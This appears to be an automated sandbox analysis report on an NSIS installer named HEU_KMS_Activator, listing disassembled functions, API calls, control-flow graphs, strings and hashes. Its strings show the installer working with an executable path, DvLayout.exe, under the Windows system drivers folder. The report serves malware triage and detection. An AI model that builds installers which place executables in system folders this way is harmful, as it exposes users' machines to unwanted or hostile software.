    • String ID: C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\*.*$Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
    • API String ID: 2035342205-2047140648
    • Opcode ID: 15c305e6868780fdf694a6f0b30c5a8d77025f459baacba135a8478b50c90af7
    • Instruction ID: 64147f4c1934b9b7c6948779cb5a6ae0941b2c180e19ba5bea4d6237524946b1
    • Opcode Fuzzy Hash: 15c305e6868780fdf694a6f0b30c5a8d77025f459baacba135a8478b50c90af7
    • Instruction Fuzzy Hash: 37510230404244BADB226B269D46BBF3AA8CF42728F21453FF852711D2CF7D49929A6D
    Function 004060EC Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 204stringCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 501 4060ec-4060f7 502 4060f9-406108 501->502 503 40610a-406126 501->503 502->503 504 406128-40612b 503->504 505 40612f-406136 503->505 504->505 506 40632b-406333 505->506 507 40613c-40613e 505->507 508 406335-406339 call 405cc1 506->508 509 40633e-40633f 506->509 510 406143-40614d 507->510 508->509 511 406153-406157 510->511 512 406329-40632a 510->512 514 40615d-40619a 511->514 515 40630f 511->515 512->506 518 4062b0-4062b4 514->518 519 4061a0-4061ab GetVersion 514->519 516 406311-406317 515->516 517 406319-40631b 515->517 520 40631c-406323 516->520 517->520 521 4062b6-4062b9 518->521 522 4062ea-4062ee 518->522 523 4061c5 519->523 524 4061ad-4061b1 519->524 520->512 527 406140 520->527 525 4062c9-4062d5 call 405cc1 521->525 526 4062bb-4062c7 call 405c1f 521->526 530 4062f0-4062f7 call 4060ec 522->530 531 4062fc-40630d lstrlenA 522->531 529 4061cc-4061d3 523->529 524->523 528 4061b3-4061b7 524->528 540 4062da-4062e0 525->540 526->540 527->510 528->523 533 4061b9-4061bd 528->533 535 4061d5-4061d7 529->535 536 4061d8-4061da 529->536 530->531 531->520 533->523 539 4061bf-4061c3 533->539 535->536 541 406213-406216 536->541 542 4061dc-4061ff call 405ba8 536->542 539->529 540->531 545 4062e2-4062e8 call 405ce3 540->545 543 406226-406229 541->543 544 406218-406224 GetSystemDirectoryA 541->544 554 406205-40620e call 4060ec 542->554 555 40629c-4062a0 542->555 548 406293-406295 543->548 549 40622b-406239 GetWindowsDirectoryA 543->549 547 406297-40629a 544->547 545->531 547->545 547->555 548->547 553 40623b-406245 548->553 549->548 557 406247-40624a 553->557 558 40625f-406275 SHGetSpecialFolderLocation 553->558 554->547 555->545 556 4062a2-4062ae lstrcatA 555->556 556->545 557->558 561 40624c-406253 557->561 562 406290 558->562 563 406277-40628e SHGetPathFromIDListA CoTaskMemFree 558->563 564 40625b-40625d 561->564 562->548 563->547 563->562 564->547 564->558
    APIs
    • GetVersion.KERNEL32(0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004061A3
    • GetSystemDirectoryA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,00002000), ref: 0040621E
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
    • GetWindowsDirectoryA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,00002000), ref: 00406231
    • lstrcatA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 004062A8
    • lstrlenA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,0042C9D8,00000000,?,00404D48,0042C9D8,00000000,00000000,00000000,00000000), ref: 004062FD
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
    • String ID: C:\Windows\SysNative\drivers\DvLayout.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
    • API String ID: 3581403547-3783127710
    • Opcode ID: b1b5b2471fa4a599259944452ce01ec4de12a949174302d799c7d87f8d264ba5
    • Instruction ID: 93734740be9412e9caa36ccbcef2caf5c2718b8fcb6d11ef7ae3655d17728ea0
    • Opcode Fuzzy Hash: b1b5b2471fa4a599259944452ce01ec4de12a949174302d799c7d87f8d264ba5
    • Instruction Fuzzy Hash: D4616530900205ABEB206F648C847BF7BA4EB46314F2681BFE953BA2D1C73C4861DB5D
    Function 00406933 Relevance: 5.4, APIs: 4, Instructions: 381COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 769 406933-406938 770 4069a7-4069bf 769->770 771 40693a-406967 769->771 774 406f66-406f7b 770->774 772 406969-40696c 771->772 773 40696e-406972 771->773 775 40697e-406981 772->775 776 406974-406978 773->776 777 40697a 773->777 778 406f95-406fa8 774->778 779 406f7d-406f93 774->779 780 406983-40698c 775->780 781 40699f-4069a2 775->781 776->775 777->775 782 406faf-406fb6 778->782 779->782 783 406991-40699d 780->783 784 40698e 780->784 785 406b70-406b8e 781->785 786 406fb8-406fbc 782->786 787 406fdd-4070e6 782->787 791 406a01-406a2f 783->791 784->783 789 406b90-406ba4 785->789 790 406ba6-406bb9 785->790 792 406fc2-406fda 786->792 793 40714b-407152 786->793 799 40716a 787->799 800 4067cb 787->800 796 406bbc-406bc6 789->796 790->796 794 406a31-406a49 791->794 795 406a4b-406a65 791->795 792->787 798 40715b-407168 793->798 801 406a69-406a73 794->801 795->801 802 406b68-406b6e 796->802 803 406bc8 796->803 804 40716d-407174 798->804 799->804 806 4067d2-4067d6 800->806 807 406913-40692e 800->807 808 4068e5-4068e9 800->808 809 406877-40687b 800->809 811 4069e9-4069ef 801->811 812 406a79 801->812 802->785 810 406b0c-406b16 802->810 813 406cc0-407128 803->813 814 406b43-406b47 803->814 806->798 819 4067dc-4067e9 806->819 807->774 822 4070f4-4070fb 808->822 823 4068ef-406903 808->823 825 406881-406898 809->825 826 4070eb-4070f2 809->826 815 407118-40711f 810->815 816 406b1c-406b3e 810->816 817 406aa3-406aa9 811->817 818 4069f5-4069fb 811->818 833 4070fd-407104 812->833 834 4069ce-4069e6 812->834 813->798 820 406b4d-406b65 814->820 821 40710f-407116 814->821 815->798 816->813 827 406b08 817->827 829 406aab-406ac9 817->829 818->791 818->827 819->799 828 4067ef-406835 819->828 820->802 821->798 822->798 832 406906-40690e 823->832 831 40689b-40689f 825->831 826->798 827->810 835 406837-40683b 828->835 836 40685d-40685f 828->836 838 406ae1-406af4 829->838 839 406acb-406adf 829->839 831->809 840 4068a1-4068a7 831->840 832->808 837 406910 832->837 833->798 834->811 841 406846-406854 GlobalAlloc 835->841 842 40683d-406840 GlobalFree 835->842 843 406861-40686b 836->843 844 40686d-406875 836->844 837->807 845 406af7-406b01 838->845 839->845 847 4068d1-4068e3 840->847 848 4068a9-4068b0 840->848 841->799 851 40685a 841->851 842->841 843->843 843->844 844->831 845->817 852 406b03 845->852 847->832 849 4068b2-4068b5 GlobalFree 848->849 850 4068bb-4068cb GlobalAlloc 848->850 849->850 850->799 850->847 851->836 854 407106-40710d 852->854 855 406a88-406aa0 852->855 854->798 855->817
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 6580b9f868d9dc6f85703e5510bdfa5e1ccb5fc973fafef01c1a6bb868ede633
    • Instruction ID: 99eaa19be747a28839d4db1251bc3981832b3ce45daee931c1dcaa17b470fdec
    • Opcode Fuzzy Hash: 6580b9f868d9dc6f85703e5510bdfa5e1ccb5fc973fafef01c1a6bb868ede633
    • Instruction Fuzzy Hash: 3EF16571904259DBDF18CF28C8946E93BB1FF44345F15812AFC9AAB281D338E995CF85
    Function 00405F56 Relevance: 4.5, APIs: 3, Instructions: 19libraryloaderCOMMON
    Download Yara Rule
    APIs
    • GetModuleHandleA.KERNEL32(?,?,00000000,004037C6,00000008), ref: 00405F66
    • LoadLibraryA.KERNELBASE(?,?,00000000,004037C6,00000008), ref: 00405F71
    • GetProcAddress.KERNEL32(00000000,?), ref: 00405F82
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: AddressHandleLibraryLoadModuleProc
    • String ID:
    • API String ID: 310444273-0
    • Opcode ID: def50b9e3654e381cb613b6edab2f42d350a82c785f1b8382793f1969df32e1c
    • Instruction ID: aca885f6507345e3ecdc89774a22647c421b20d3aef76600dda3df63f8cb038a
    • Opcode Fuzzy Hash: def50b9e3654e381cb613b6edab2f42d350a82c785f1b8382793f1969df32e1c
    • Instruction Fuzzy Hash: 66E0C2326046169BCA000F319E0896B7768EFA9741305483EF545F3150CB38A8228FB9
    Function 00405F2F Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
    Download Yara Rule
    APIs
    • FindFirstFileA.KERNELBASE(?,0043D238,0043AA38,0040605F,0043AA38), ref: 00405F3A
    • FindClose.KERNELBASE(00000000), ref: 00405F46
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: Find$CloseFileFirst
    • String ID:
    • API String ID: 2295610775-0
    • Opcode ID: 8dd8536ca96e7a9bb2d48d313d3bae79af9a5c131b18c7ae9ad25969cd044193
    • Instruction ID: 47b19902f346a8a8984bb97a0dfd505380ec54685fe9ae0f167d9c0e98e53194
    • Opcode Fuzzy Hash: 8dd8536ca96e7a9bb2d48d313d3bae79af9a5c131b18c7ae9ad25969cd044193
    • Instruction Fuzzy Hash: 93D012355095205BC34067386D0C84B7B58DF19331B104B36F66DF61E0CB388C528A9D
    Function 0040158D Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 357sleepfilewindowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 0 40158d-4015de 1 4015e4 0->1 2 402ef6-402eff 0->2 4 401600-401618 call 401450 call 405eff call 404d10 1->4 5 401700-40171c 1->5 6 401721-40172e call 405c1f 1->6 7 4016c2-4016ca 1->7 8 4017a3-4017c8 call 401450 call 405eff call 405aa0 1->8 9 401627-401630 1->9 10 4016a9-4016bd call 405eff SetForegroundWindow 1->10 11 4015eb-4015fb call 405eff 1->11 12 40186f-401880 call 401450 call 405f2f 1->12 13 401733-401740 1->13 14 4018b4-4018ec call 401450 * 3 call 405eff MoveFileA 1->14 15 401934-401953 call 401450 GetFullPathNameA 1->15 16 40163b-401653 call 401373 call 405eff call 40138f 1->16 17 40199c-4019b9 call 401450 SearchPathA 1->17 18 40165d-40167a call 401450 call 405eff call 404d10 1->18 19 40167f-401698 call 40143a call 405eff 1->19 20 40175f-401786 call 401450 call 405eff SetFileAttributesA 1->20 33 402f01-402f05 2->33 36 40161d-401622 4->36 5->33 6->2 30 4016cc-4016ea call 40143a 7->30 31 4016ef-4016fb 7->31 99 401840-401843 8->99 100 4017ca-4017e5 call 405a5f CreateDirectoryA 8->100 35 401632-401639 PostQuitMessage 9->35 9->36 10->2 11->33 82 401882-401896 call 405eff 12->82 83 40189b-4018af call 405eff 12->83 39 401742-401746 ShowWindow 13->39 40 401749-401750 13->40 115 4018f5-4018f8 14->115 116 4018ee-4018f0 14->116 61 401955-40195a 15->61 62 401978-40197a 15->62 90 401658 16->90 17->2 66 4019bf-4019c8 17->66 18->2 84 40169a-40169c 19->84 85 40169d-4016a4 Sleep 19->85 20->2 79 40178c-401798 call 405eff 20->79 30->2 31->2 35->36 36->33 39->40 40->2 55 401756-40175a ShowWindow 40->55 55->2 73 401981-401984 61->73 74 40195c-40195e 61->74 62->73 66->2 73->2 88 40198a-401997 GetShortPathNameA 73->88 74->73 86 401960-401968 call 405f2f 74->86 98 40179d-40179e 79->98 82->33 83->33 84->85 85->2 86->62 107 40196a-401976 call 405cc1 86->107 88->2 90->33 98->2 109 401863 99->109 110 401845-40185e call 401429 call 405cc1 SetCurrentDirectoryA 99->110 119 4017e7-4017f2 GetLastError 100->119 120 401829-40182f call 405eff 100->120 107->73 112 401865-40186a call 401429 109->112 110->2 112->2 122 4018fa-401902 call 405f2f 115->122 123 40191c-401922 115->123 116->112 128 4017f4-40180c GetLastError call 405eff 119->128 129 40180e-401817 GetFileAttributesA 119->129 137 401834-401835 120->137 122->123 138 401904-40191a call 406342 call 401429 122->138 127 401929-40192f call 405eff 123->127 127->98 135 401836-40183e 128->135 129->135 136 401819-401827 call 405eff 129->136 135->99 135->100 136->137 137->135 138->127
    APIs
    • PostQuitMessage.USER32(00000000), ref: 00401633
    • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0040169E
    • SetForegroundWindow.USER32(?), ref: 004016B7
    • ShowWindow.USER32(?), ref: 00401744
    • ShowWindow.USER32(?,00000001), ref: 00401758
    • SetFileAttributesA.KERNEL32(00000000,?), ref: 0040177E
    • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000), ref: 004017DD
    • GetLastError.KERNEL32(?,00000000,0000005C,00000000), ref: 004017E7
    • GetLastError.KERNEL32(?,00000000,0000005C,00000000), ref: 004017F4
    • SetCurrentDirectoryA.KERNELBASE(00000000,00475000,00000000,000000E6,00000000), ref: 00401858
    • MoveFileA.KERNEL32(00000000,?), ref: 004018E4
    • GetFullPathNameA.KERNEL32(00000000,00002000,?,?,000000E3,?,?,00000000), ref: 0040194B
    • GetShortPathNameA.KERNEL32(?,?,00002000), ref: 00401991
    • SearchPathA.KERNEL32(00000000,00000000,00000000,00002000,?,?,?,?,00000000), ref: 004019B1
    Strings
    • CreateDirectory: "%s" (%d), xrefs: 004017B1
    • Jump: %d, xrefs: 004015EC
    • detailprint: %s, xrefs: 00401665
    • CreateDirectory: can't create "%s" (err=%d), xrefs: 004017FC
    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 0040181A
    • Sleep(%d), xrefs: 00401689
    • SetFileAttributes failed., xrefs: 00401793
    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 0040189F
    • Aborting: "%s", xrefs: 00401608
    • CreateDirectory: "%s" created, xrefs: 0040182A
    • SetFileAttributes: "%s":%08X, xrefs: 0040176D
    • Rename on reboot: %s, xrefs: 00401915
    • IfFileExists: file "%s" exists, jumping %d, xrefs: 00401886
    • Rename: %s, xrefs: 004018D4
    • Rename failed: %s, xrefs: 0040191D
    • Call: %d, xrefs: 00401645
    • BringToFront, xrefs: 004016A9
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: PathWindow$DirectoryErrorFileLastNameShow$AttributesCreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
    • API String ID: 1049312888-3619442763
    • Opcode ID: 92d6c438a4e92df1c16294230002a52b75c6c0211279c0c80293cf5291ef5e81
    • Instruction ID: 43567aab8204be1f6f8a6f214d53e59326f3baeabd2f2d3e9f428d24070b1dcb
    • Opcode Fuzzy Hash: 92d6c438a4e92df1c16294230002a52b75c6c0211279c0c80293cf5291ef5e81
    • Instruction Fuzzy Hash: E4B10132904114AFDB107BA59D499AF3BB8EF45364B24013FF851B32E2DE7C4941ABAD
    Function 004056B1 Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 222stringregistrylibraryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 256 4056b1-4056c9 call 405f56 259 4056cb-4056db call 405c1f 256->259 260 4056dd-405704 call 405ba8 256->260 269 405727-405750 call 403d3b call 406014 259->269 264 405706-405717 call 405ba8 260->264 265 40571c-405722 lstrcatA 260->265 264->265 265->269 274 405756-40575b 269->274 275 4057d7-4057df call 406014 269->275 274->275 276 40575d-405781 call 405ba8 274->276 280 4057e1-4057e8 call 4060ec 275->280 281 4057ed-4057f4 275->281 276->275 283 405783-405785 276->283 280->281 285 4057f6-4057fc 281->285 286 40580d-405832 LoadImageA 281->286 287 405796-4057a2 lstrlenA 283->287 288 405787-405794 call 405a5f 283->288 285->286 289 4057fe-405803 call 403d1a 285->289 290 4058c1-4058c9 call 401411 286->290 291 405838-40586e RegisterClassA 286->291 293 4057a4-4057b2 lstrcmpiA 287->293 294 4057ca-4057d2 call 405fc0 call 405cc1 287->294 288->287 289->286 308 4058d3-4058de call 403d3b 290->308 309 4058cb-4058ce 290->309 296 405990 291->296 297 405874-4058bc SystemParametersInfoA CreateWindowExA 291->297 293->294 301 4057b4-4057be GetFileAttributesA 293->301 294->275 300 405992-405999 296->300 297->290 305 4057c0-4057c2 301->305 306 4057c4-4057c5 call 405fed 301->306 305->294 305->306 306->294 314 4058e4-405901 ShowWindow LoadLibraryA 308->314 315 405967-40596f call 404de2 308->315 309->300 316 405903-405908 LoadLibraryA 314->316 317 40590a-40591c GetClassInfoA 314->317 323 405971-405977 315->323 324 405989-40598b call 401411 315->324 316->317 319 405934-405965 DialogBoxParamA call 401411 call 403b0e 317->319 320 40591e-40592e GetClassInfoA RegisterClassA 317->320 319->300 320->319 323->309 327 40597d-405984 call 401411 323->327 324->296 327->309
    APIs
      • Part of subcall function 00405F56: GetModuleHandleA.KERNEL32(?,?,00000000,004037C6,00000008), ref: 00405F66
      • Part of subcall function 00405F56: LoadLibraryA.KERNELBASE(?,?,00000000,004037C6,00000008), ref: 00405F71
      • Part of subcall function 00405F56: GetProcAddress.KERNEL32(00000000,?), ref: 00405F82
    • lstrcatA.KERNEL32(00479000,004329D8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004329D8,00000000,00000006,00471000,00000000,0047B000,00000000), ref: 00405722
    • lstrlenA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe,?,?,?,C:\Windows\SysNative\drivers\DvLayout.exe,00000000,00473000,00479000,004329D8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004329D8,00000000,00000006,00471000), ref: 00405797
    • lstrcmpiA.KERNEL32(?,.exe), ref: 004057AA
    • GetFileAttributesA.KERNEL32(C:\Windows\SysNative\drivers\DvLayout.exe), ref: 004057B5
    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00473000), ref: 0040581E
      • Part of subcall function 00405C1F: wsprintfA.USER32 ref: 00405C2C
    • RegisterClassA.USER32 ref: 00405865
    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040587D
    • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004058B6
    • ShowWindow.USER32(00000005,00000000), ref: 004058EC
    • LoadLibraryA.KERNEL32(RichEd20), ref: 004058FD
    • LoadLibraryA.KERNEL32(RichEd32), ref: 00405908
    • GetClassInfoA.USER32(00000000,RichEdit20A,00444780), ref: 00405918
    • GetClassInfoA.USER32(00000000,RichEdit,00444780), ref: 00405925
    • RegisterClassA.USER32(00444780), ref: 0040592E
    • DialogBoxParamA.USER32(?,00000000,00405203,00000000), ref: 0040594D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
    • String ID: .DEFAULT\Control Panel\International$.exe$C:\Windows\SysNative\drivers\DvLayout.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
    • API String ID: 914957316-3174253577
    • Opcode ID: 740a21c8eb156348ea30bb121eb7f6539eb9b3385ce34993b4d1fb3ae82879e5
    • Instruction ID: 23a913ed313d04aaa964b1e3adb5b6dbdec39892ae29868ca26d260f2d2d0806
    • Opcode Fuzzy Hash: 740a21c8eb156348ea30bb121eb7f6539eb9b3385ce34993b4d1fb3ae82879e5
    • Instruction Fuzzy Hash: 3371A2B1540704AFE710AB659D85F2B3AACEB81709F10043FF945B61E2DB7C98419F2D
    Function 004019F0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 186stringtimeCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 00405EFF: lstrlenA.KERNEL32(RMDir: RemoveDirectory("C:\Users\user~1\AppData\Local\Temp\nsoB6EE.tmp\"),004066A6,RMDir: RemoveDirectory("%s"),?,?,?), ref: 00405F0B
      • Part of subcall function 00405EFF: wvsprintfA.USER32(69444D52,?,?), ref: 00405F21
    • lstrcatA.KERNEL32(00000000,00000000,C:\Windows\SysNative\drivers\DvLayout.exe,00475000,00000000,00000000), ref: 00401A48
    • CompareFileTime.KERNEL32(-00000014,00475000,C:\Windows\SysNative\drivers\DvLayout.exe,C:\Windows\SysNative\drivers\DvLayout.exe,00000000,00000000,C:\Windows\SysNative\drivers\DvLayout.exe,00475000,00000000,00000000), ref: 00401A72
      • Part of subcall function 00405CC1: lstrcpynA.KERNEL32(?,?,00002000,004037F1,004447E0,NSIS Error), ref: 00405CCE
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000,?), ref: 00404D49
      • Part of subcall function 00404D10: lstrlenA.KERNEL32(00403158,0042C9D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403158,00000000), ref: 00404D59
      • Part of subcall function 00404D10: lstrcatA.KERNEL32(0042C9D8,00403158,00403158,0042C9D8,00000000,00000000,00000000), ref: 00404D6C
      • Part of subcall function 00404D10: SetWindowTextA.USER32(0042C9D8,0042C9D8), ref: 00404D7E
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DA4
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404DBE
      • Part of subcall function 00404D10: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404DCC
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1280341229.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1280307966.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280376897.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280400655.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000001.00000002.1280529774.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_HEU_KMS_Activator.jbxd
    Similarity
    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
